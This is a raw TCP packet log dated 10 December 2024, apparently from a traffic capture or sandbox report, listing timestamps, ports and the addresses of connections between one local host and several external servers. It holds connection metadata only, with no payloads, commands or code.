                                                                                          Dec 10, 2024 07:27:48.375308037 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:48.375392914 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:48.375451088 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:48.375511885 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:48.375530958 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:48.378832102 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:48.378880978 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.378988981 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:48.392841101 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:48.392862082 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.446718931 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.446930885 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:48.492770910 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.492897034 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:48.503576994 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.503614902 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.503629923 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.503787041 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.503792048 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.503901958 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.504023075 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.504029989 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.504128933 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.504188061 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.504203081 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.504304886 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.504417896 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.504424095 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.504508972 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.545216084 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.612210035 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.633727074 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.753993034 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:48.755002022 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:49.831355095 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:49.831438065 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:49.835556030 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:49.835565090 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:49.835941076 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:49.882145882 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:49.914973021 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:49.955334902 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.384149075 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.384176016 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.384182930 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.384280920 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.384295940 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.429040909 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.477713108 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.477727890 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.477866888 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.575485945 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.575496912 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.575647116 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.599545956 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.599555969 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.599662066 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.622541904 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.622551918 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.622684956 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.669660091 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.669671059 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.669744968 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.754020929 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.754030943 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.754204035 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.771717072 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.771831036 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.785734892 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.785903931 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.798553944 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.798661947 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.814589977 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.814744949 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.823513985 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.823662996 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.871232033 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.871381998 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.881562948 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.881691933 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.947555065 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.947726965 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.955625057 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.955856085 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.965502977 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.965625048 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.973094940 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.973196983 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.980753899 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.980942965 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.990700960 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.990844965 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:50.997811079 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:50.997925997 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.003645897 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.003730059 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.009355068 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.009447098 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.016808987 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.016891003 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.057085991 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.057368994 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.062486887 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.062619925 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.068258047 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.068371058 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.136699915 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.136805058 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.142354012 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.142463923 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.146750927 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.146848917 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.151024103 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.151170969 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.155364037 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.155479908 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.161006927 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.161160946 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.165297985 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.165383101 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.169648886 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.169730902 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.175348043 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.175457954 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.179063082 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.179220915 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.184653044 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.184845924 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.190064907 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.190212011 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.246432066 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.246529102 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.249017000 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.249135971 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.252269983 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.252360106 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.255466938 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.255544901 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.330147982 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.330264091 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.333237886 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.333329916 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.337137938 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.337259054 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.340167999 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.340270042 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.343302011 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.343377113 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.346421003 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.346498013 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.350469112 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.350548029 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.353436947 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.353512049 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.356614113 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.356688023 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.360209942 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.360284090 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.363243103 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.363333941 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.367234945 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.367306948 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.370518923 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.370585918 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.439541101 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.439682961 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.441967964 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.442048073 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.445326090 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.445406914 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.521337986 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.521471977 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.523794889 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.523885012 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.526307106 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.526406050 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.528762102 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.528848886 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.531927109 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.532001972 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.534399033 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.534466982 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.536953926 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.537024021 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.539459944 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.539556980 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.542637110 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.542727947 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.545192957 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.545273066 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.547960997 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.548029900 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.550503016 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.550571918 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.552932978 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.553025007 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.631879091 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.632002115 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.634381056 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.634464979 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.636723042 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.636790991 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.712533951 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.712620020 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.715126038 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.715199947 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.717808008 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.717880964 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.720197916 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.720271111 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.723341942 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.723412991 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.725836039 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.725919962 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.728358984 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.728423119 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.730818987 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.730886936 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.734020948 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.734087944 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.736438036 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.736510992 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.739260912 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.739341021 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.741775990 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.741835117 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.744513035 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.744601011 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.746844053 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.746906996 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.824469090 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.824533939 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.827224016 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.827300072 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.830214977 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.830281019 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.906621933 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.906722069 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.909029961 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.909116030 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.911560059 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.911638021 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.914037943 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.914119005 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.917207956 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.917294025 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.919641972 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.919735909 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.922211885 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.922291994 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.924664974 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.924727917 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.927967072 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.928035975 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.930711031 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.930773020 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.933204889 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.933259964 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.935843945 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.935909986 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:51.938213110 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:51.938275099 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.016277075 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:52.016375065 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.018660069 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:52.018739939 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.021234035 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:52.021310091 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.097507000 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:52.097660065 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.100402117 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:52.100475073 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.102852106 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:52.102926970 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.105501890 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:52.105567932 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.107853889 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:52.107945919 CET4434970691.149.219.45192.168.2.8
                                                                                          Dec 10, 2024 07:27:52.107945919 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.107989073 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.110675097 CET49706443192.168.2.891.149.219.45
                                                                                          Dec 10, 2024 07:27:52.833507061 CET4970780192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:27:52.952934027 CET8049707208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:27:52.953054905 CET4970780192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:27:52.956732035 CET4970780192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:27:53.075994968 CET8049707208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:27:54.123486042 CET8049707208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:27:54.163408995 CET4970780192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:27:59.021430969 CET4970780192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:28:10.044675112 CET4971180192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:28:10.164483070 CET8049711208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:28:10.164573908 CET4971180192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:28:10.165043116 CET4971180192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:28:10.284341097 CET8049711208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:28:11.267781973 CET8049711208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:28:11.428973913 CET4971180192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:28:12.578345060 CET4971380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:12.697649956 CET8049713147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:12.697755098 CET4971380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:12.698286057 CET4971380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:12.817662954 CET8049713147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:13.058620930 CET4971380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:13.178000927 CET8049713147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:13.959307909 CET8049713147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:13.983135939 CET8049713147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:13.983175039 CET8049713147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:13.983207941 CET4971380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:14.045324087 CET4971380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:14.045775890 CET4971180192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:28:14.164882898 CET8049713147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:14.165460110 CET8049711208.95.112.1192.168.2.8
                                                                                          Dec 10, 2024 07:28:14.165972948 CET4971180192.168.2.8208.95.112.1
                                                                                          Dec 10, 2024 07:28:14.193962097 CET4971480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:14.313319921 CET8049714147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:14.313410044 CET4971480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:14.339091063 CET4971480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:14.426491976 CET4971380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:14.447038889 CET8049713147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:14.458430052 CET8049714147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:14.545864105 CET8049713147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:14.616501093 CET4971380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:14.833616018 CET8049713147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:14.908617020 CET4971480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:14.928956032 CET4971380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:15.028127909 CET8049714147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:15.028141022 CET8049714147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:15.028187990 CET8049714147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:15.339559078 CET4971380192.168.2.8147.45.47.151
